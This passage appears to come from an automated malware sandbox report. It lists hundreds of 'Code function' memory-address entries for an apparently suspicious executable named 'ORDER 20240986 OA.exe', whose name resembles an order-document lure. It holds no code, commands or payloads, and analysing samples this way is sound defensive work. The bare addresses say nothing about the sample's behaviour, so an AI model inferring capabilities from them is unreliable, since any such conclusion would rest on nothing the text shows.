            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075604C04_2_075604C0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756E2C84_2_0756E2C8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07569FC84_2_07569FC8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075648F74_2_075648F7
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07560DF04_2_07560DF0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756DDF04_2_0756DDF0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075616FF4_2_075616FF
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07569AFF4_2_07569AFF
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07566FFA4_2_07566FFA
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07561FF84_2_07561FF8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756B2F84_2_0756B2F8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756CAE04_2_0756CAE0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07560DE04_2_07560DE0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075687E04_2_075687E0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07563FE84_2_07563FE8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756F5E84_2_0756F5E8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07561FE84_2_07561FE8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756B2E84_2_0756B2E8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756E7904_2_0756E790
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07561B914_2_07561B91
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07562D9A4_2_07562D9A
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07564D984_2_07564D98
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075679984_2_07567998
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075612804_2_07561280
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075691804_2_07569180
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756A48F4_2_0756A48F
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075624884_2_07562488
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756BC884_2_0756BC88
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075679884_2_07567988
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07564D894_2_07564D89
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756FAB04_2_0756FAB0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075674BF4_2_075674BF
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075656B84_2_075656B8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07568CB84_2_07568CB8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756E2B84_2_0756E2B8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756CFA64_2_0756CFA6
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07561BA04_2_07561BA0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756A4A04_2_0756A4A0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756FAA04_2_0756FAA0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756B7AF4_2_0756B7AF
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07562DA84_2_07562DA8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756CFA84_2_0756CFA8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075656A84_2_075656A8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07568CA94_2_07568CA9
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0761D7104_2_0761D710
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0761EE484_2_0761EE48
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076170C04_2_076170C0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076167604_2_07616760
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076135604_2_07613560
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076103604_2_07610360
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07614B404_2_07614B40
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076119404_2_07611940
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076103504_2_07610350
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076167504_2_07616750
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076161204_2_07616120
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07612F204_2_07612F20
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076145004_2_07614500
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076113004_2_07611300
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076141E04_2_076141E0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07610FE04_2_07610FE0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076157C04_2_076157C0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076125C04_2_076125C0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076199C84_2_076199C8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07610FD04_2_07610FD0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076141D04_2_076141D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07616DA04_2_07616DA0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07613BA04_2_07613BA0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076109A04_2_076109A0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076151804_2_07615180
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07611F804_2_07611F80
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07614E604_2_07614E60
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07611C604_2_07611C60
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07616A704_2_07616A70
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076132404_2_07613240
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076100404_2_07610040
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076164404_2_07616440
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076148204_2_07614820
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076116204_2_07611620
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076100364_2_07610036
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07615E004_2_07615E00
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07612C004_2_07612C00
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07615AE04_2_07615AE0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076128E04_2_076128E0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07613EC04_2_07613EC0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07610CC04_2_07610CC0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076154A04_2_076154A0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076122A04_2_076122A0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076138804_2_07613880
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076106804_2_07610680
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07616A804_2_07616A80
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762FB304_2_0762FB30
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076284704_2_07628470
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07621CF04_2_07621CF0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076213604_2_07621360
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07629D704_2_07629D70
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762CF704_2_0762CF70
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762E5504_2_0762E550
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762B3504_2_0762B350
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076213514_2_07621351
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762C9304_2_0762C930
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076297304_2_07629730
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076205084_2_07620508
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762AD104_2_0762AD10
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762DF104_2_0762DF10
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076235E84_2_076235E8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762DBF04_2_0762DBF0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762A9F04_2_0762A9F0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762F1D04_2_0762F1D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076209D04_2_076209D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07628DD04_2_07628DD0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762BFD04_2_0762BFD0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762D5B04_2_0762D5B0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762A3B04_2_0762A3B0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076209BF4_2_076209BF
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762B9904_2_0762B990
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076287904_2_07628790
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762EB904_2_0762EB90
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762E8614_2_0762E861
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762E8704_2_0762E870
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762B6704_2_0762B670
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076200404_2_07620040
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762CC414_2_0762CC41
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07629A504_2_07629A50
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762CC504_2_0762CC50
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762E2214_2_0762E221
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076218284_2_07621828
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762B0304_2_0762B030
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762E2304_2_0762E230
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762C6104_2_0762C610
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076294104_2_07629410
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762F8104_2_0762F810
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076200174_2_07620017
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076218174_2_07621817
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07621CE04_2_07621CE0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762F4F04_2_0762F4F0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076290F04_2_076290F0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762C2F04_2_0762C2F0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076204F94_2_076204F9
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762D8D04_2_0762D8D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762A6D04_2_0762A6D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762BCB04_2_0762BCB0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07628AB04_2_07628AB0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762EEB04_2_0762EEB0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07620E8D4_2_07620E8D
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762A0904_2_0762A090
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0762D2904_2_0762D290
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07620E984_2_07620E98
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076636F04_2_076636F0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076614704_2_07661470
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07661B504_2_07661B50
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076629204_2_07662920
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076647BB4_2_076647BB
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076622384_2_07662238
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076630084_2_07663008
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07660D884_2_07660D88
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076614604_2_07661460
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076636E14_2_076636E1
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07660D7B4_2_07660D7B
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07662FFB4_2_07662FFB
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076600404_2_07660040
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076622294_2_07662229
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07661B3F4_2_07661B3F
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07660A034_2_07660A03
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076600124_2_07660012
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07660A104_2_07660A10
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_076629114_2_07662911
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC91E804_2_3AC91E80
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9DE004_2_3AC9DE00
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC917A04_2_3AC917A0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC993284_2_3AC99328
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9FC684_2_3AC9FC68
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC950284_2_3AC95028
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC929684_2_3AC92968
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9EAF84_2_3AC9EAF8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9E6A04_2_3AC9E6A0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9E6B04_2_3AC9E6B0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9E2494_2_3AC9E249
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9E2584_2_3AC9E258
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9E2574_2_3AC9E257
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC91E704_2_3AC91E70
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9178F4_2_3AC9178F
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC98B914_2_3AC98B91
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9F3A84_2_3AC9F3A8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC98BA04_2_3AC98BA0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9F3B84_2_3AC9F3B8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9EF514_2_3AC9EF51
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9EF604_2_3AC9EF60
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9EB084_2_3AC9EB08
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC90B204_2_3AC90B20
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC90B304_2_3AC90B30
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9D0E94_2_3AC9D0E9
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9D0F84_2_3AC9D0F8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9CC8F4_2_3AC9CC8F
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9CCA04_2_3AC9CCA0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC900404_2_3AC90040
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9F8014_2_3AC9F801
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC99C184_2_3AC99C18
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC950184_2_3AC95018
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9F8104_2_3AC9F810
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC900124_2_3AC90012
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9DDF14_2_3AC9DDF1
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9D9994_2_3AC9D999
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9D9A84_2_3AC9D9A8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC995484_2_3AC99548
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9D5404_2_3AC9D540
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9295A4_2_3AC9295A
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AC9D5504_2_3AC9D550
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE88FB04_2_3AE88FB0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE87B784_2_3AE87B78
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE881D04_2_3AE881D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE811A04_2_3AE811A0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8F2E74_2_3AE8F2E7
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8F2F84_2_3AE8F2F8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE822F04_2_3AE822F0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8D2F74_2_3AE8D2F7
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE872C84_2_3AE872C8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE84EC24_2_3AE84EC2
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE84ED04_2_3AE84ED0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE81EA84_2_3AE81EA8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE872B84_2_3AE872B8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE81E984_2_3AE81E98
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8EE684_2_3AE8EE68
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE84A6A4_2_3AE84A6A
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE86E624_2_3AE86E62
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8CE674_2_3AE8CE67
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8CE784_2_3AE8CE78
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE84A784_2_3AE84A78
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE86E704_2_3AE86E70
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE81A414_2_3AE81A41
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE81A504_2_3AE81A50
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8EE574_2_3AE8EE57
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE846204_2_3AE84620
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE86A074_2_3AE86A07
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE86A184_2_3AE86A18
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE846104_2_3AE84610
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE82FF94_2_3AE82FF9
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE85BD84_2_3AE85BD8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8B7A84_2_3AE8B7A8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE82BA04_2_3AE82BA0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE88FA04_2_3AE88FA0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE82BB04_2_3AE82BB0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8F7884_2_3AE8F788
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE857804_2_3AE85780
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8D7874_2_3AE8D787
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8B7984_2_3AE8B798
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8D7984_2_3AE8D798
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE87B694_2_3AE87B69
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8F7784_2_3AE8F778
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE857704_2_3AE85770
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE827494_2_3AE82749
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE827584_2_3AE82758
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE853284_2_3AE85328
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE877204_2_3AE87720
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8D3084_2_3AE8D308
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE823004_2_3AE82300
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8B3074_2_3AE8B307
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8B3184_2_3AE8B318
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8531A4_2_3AE8531A
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE877104_2_3AE87710
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE808E04_2_3AE808E0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE808F04_2_3AE808F0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8C0C84_2_3AE8C0C8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE880C84_2_3AE880C8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8E0A74_2_3AE8E0A7
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8E0B84_2_3AE8E0B8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE838B84_2_3AE838B8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8C0B74_2_3AE8C0B7
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE864884_2_3AE86488
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE804894_2_3AE80489
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE804984_2_3AE80498
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE834604_2_3AE83460
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE864784_2_3AE86478
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE800404_2_3AE80040
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE834504_2_3AE83450
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8DC284_2_3AE8DC28
